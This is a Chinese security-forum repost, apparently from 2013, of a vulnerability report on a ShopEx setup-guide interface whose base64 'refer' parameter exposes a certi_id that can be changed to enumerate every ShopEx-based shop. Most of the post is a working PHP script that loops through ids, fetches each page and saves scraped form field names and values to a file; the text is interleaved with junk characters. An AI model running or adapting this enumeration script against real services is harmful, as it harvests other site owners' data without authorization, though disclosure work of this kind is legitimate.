找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2790|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:6 i# |9 _+ H- X  U" }( g5 l
ShopEx某接口缺陷,可遍历所有网站
+ Q3 W3 M2 Y4 L详细说明:0 [$ V( D% G# n; m, ]* C' V' `( v
问题出现在shopex 网店使用向导页面
8 m4 X* a4 u/ N+ j- D  @
5 G( g" a) e1 F! l% `- w# e0 j* J) ~% A5 n( H
1 X/ h0 `( M  R  _2 F2 j$ y: F# N
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
2 ^) _9 p4 n6 X7 N6 p0 {% n$ M, B

4 N+ s  _# T% ?( E! r4 d8 m6 w- a. Z! a  N( x1 k) T
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
7 s0 o4 d- ?  Y! u
. ^' n! V; l6 m+ W) s: y& O% y3 b9 |7 K0 p  q! o

" C' K% C5 A9 \& ]* o7 t我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 4 p  X' ]% V) ]2 N/ U' _) z
- W3 G3 t& M! y) Q4 K# E
8 q' }1 E# z" N9 T6 ?

0 v- i9 r8 _7 |<?php
9 x* Z/ M4 u1 x7 }/ m. g7 K, f% C& O5 L0 S
                for ($i=1; $i < 10000; $i++) { //遍历
2 @0 O9 n; J8 o2 ~
- ^: d+ i: g" Q8 B) Y                        ShowshopExD($i);/ ^% ]0 U  ^1 e  l5 r$ q
" N; S; L0 }2 ?! L, A
                }4 M' O. P# G1 s* D% |
& Z- ^* W# l7 g" P# X
                function ShowshopExD($cid) {0 U) ]$ |4 |9 i6 J, ^

% [& s3 G( q7 d( ~( @0 u                $url='http://guide.ecos.shopex.cn/step2.php';
4 a& \; C' j! B) d3 ?2 i3 K3 J# W) c# ~- V4 h
                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
2 W4 t+ P$ j1 m8 X8 f1 J+ ]& _' A1 W/ h# L
        $url = $url.'?refer='.$refer;
7 c- Z, I; t* E& V3 ^' ^
2 [. L' T$ Y6 Y+ i: U# c        $ch = curl_init($url);' Z. c( N/ ~2 |0 o' Z

$ T3 X9 Q3 @1 f4 |9 @8 g" B. D        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
5 R, d: p" W" n5 J- \9 R
! W. ^9 Q* y% k' e) q        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
2 c! X% \. T$ n/ [+ z
. e! A* q' w" L        $result = curl_exec($ch);
  H% @( v2 H4 X7 L! J  z; i  a, A7 x0 Y8 F
        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
' \) s1 T" I% ]/ ?5 @
) S! m! X" s4 o" w- U! T  j        if(strpos($result,$refer)); B% I1 J$ S9 ^) ~
" y8 q1 L0 q* W  U# V# b
        {
( v9 e: d0 }- k7 ~8 l; L% b& q# D1 X, p$ o' m5 ^9 g0 c; Y
                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
8 [5 ^- Z/ l# k0 y4 r1 f2 {2 i3 u! e% u
                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
* m$ f' p( ]% F' G/ ~% O- R; `
; c$ q9 h/ P4 n8 }+ o2 x' V  g                foreach ($value[1] as $key) {2 m$ r0 M9 d; S. q( `3 M+ R

5 P5 z, I6 i+ H# j2 k                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
& V* r2 D+ y. i$ P
8 j4 V+ _! X& M! V3 S                        echo $res[1][0].':'.$res[3][0]."\r\n";
4 f8 [2 @6 U/ D
4 B( Y9 d/ A5 t. z: T$ `( y: a                        $col =$res[1][0].':'.$res[3][0]."\r\n"; - O# L: l# v) Y3 m3 U

* X9 M2 z, d1 t( p9 I' {6 z                        fwrite($fp, $col, strlen($col));
7 S2 V6 u2 q$ q7 R
  \5 [! n' ~3 t: d# S# w                }8 m, U& w+ x: V  n( @! |
7 _9 H. ?" I/ C+ F, p. c6 C
                echo '--------------------------------'."\r\n";1 k+ E! ?! N8 b; Y* `! t
8 q: e' x6 ]; F8 X
                fclose($fp);
9 D0 s  d: w8 M7 t
  C& l- ]( r, v        }
: B  _& S! n8 F7 n+ g5 Z+ j( U5 {
8 \' _. s# _7 H4 E2 f        flush();* m$ t- k# N4 t" g, C7 H- g

5 E5 w" H4 E/ O+ n& U. ^        curl_close($ch);- U8 A0 k2 A( _5 t; s. t' Y

5 l( p: o0 x& i2 @+ I$ d                }
, Y3 n3 |8 n6 a  y$ w3 [" I  B$ y% q  A
?>
+ ?4 j2 r# z. O- T漏洞证明:, [; a1 {" b0 g
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
) z. ^) P4 M; a3 N" e" U' brefer换成其他加密方式
3 d6 R7 }$ [+ p! G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表